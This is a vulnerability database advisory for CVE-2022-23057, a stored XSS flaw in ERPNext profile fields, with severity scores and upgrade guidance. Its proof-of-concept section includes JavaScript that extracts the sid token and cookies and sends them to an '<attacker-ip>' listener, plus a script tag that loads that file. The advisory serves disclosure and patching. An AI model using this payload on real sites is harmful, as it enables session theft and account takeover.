Mend.io Vulnerability Database

What is a CVE vulnerability ID? icon What is a WS vulnerability ID? icon What is an MSC vulnerability ID? icon
New vulnerability? Tell us about it!
icon

We found results for “

CVE-2022-23057

Date: June 22, 2022

Overview

ERPNext is affected by a stored XSS vulnerability that allows low privileged application users to store malicious scripts on ‘Location’, ‘Interests’ and ‘Bio’ fields in the “Edit Profile” section. These scripts are executed in a victim’s browser when they open the page containing the vulnerable field. The victim who inadvertently triggers the attack, can be a highly privileged user, such as an administrator, so the injected scripts can extract the sid token and cookies, which can lead to full Account takeover and Privilege escalation. Moreover, there is an availability issue, once the javascript payload is stored on the server, the victim would not be able to browse through the platform.

Details

In ERPNext, versions v12.0.9--v13.0.3 are vulnerable to Stored Cross-Site-Scripting (XSS), due to user input not being validated properly. A low privileged attacker could inject arbitrary code into input fields when editing his profile.

PoC Details

Login as a low application user, go to the ‘My profile’ section under “Settings”, then click on the ‘Edit Profile’ button. Edit ‘Bio’ input field, insert the XSS payload, as can be seen in the POC code section. Now create a file ‘test1.js’ as described in the POC code and set-up a simple http listener. Once a user will login, the payload will get executed and the user’s cookie session will be compromised. Using the captured data the attacker can login as another user.

test1.js code:
var re = /\\"sid\\":\\s\\"[0-9a-zA-Z]+\\"/gm;
var te = /[0-9a-zA-Z]+/gm;

var getSID = (document.documentElement.innerHTML).match(re);
getSID = getSID[0].split(':');
getSID = getSID[1].match(te);
console.log(getSID);
url = 'http://<attacker-ip>:<port>/?sid='+getSID;
var script = document.createElement('script');
script.src = url+"&details= " + document.cookie;
document.getElementsByTagName('head')[0].appendChild(script);

PoC Code

javascript XSS code:
<!--</SCRIPT><script src=http://<attacker-ip>:<port>/test1.js></script>-->

Affected Environments

ERPNext versions v12.0.9 through v13.0.3

Prevention

Upgrade to ERPNext version 13.1.0

Language: Python

Good to know:

icon

Cross-Site Scripting (XSS)

CWE-79
icon

Upgrade Version

Upgrade to version v13.1.0

Learn More

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): Low
Integrity (I): Low
Availability (A): None
Base Score:
Access Vector (AV): Network
Access Complexity (AC): Medium
Authentication (AU): Single
Confidentiality (C): None
Integrity (I): Partial
Availability (A): None
Additional information:

Related Resources (4)

https://github.com/frappe/frappe/commit/497ea861f481c6a3c52fe2aed9d0df1b6c99e9d7
https://www.mend.io/vulnerability-database/CVE-2022-23057
https://nvd.nist.gov/vuln/detail/CVE-2022-23057
https://www.mend.io/vulnerability-database/CVE-2022-23057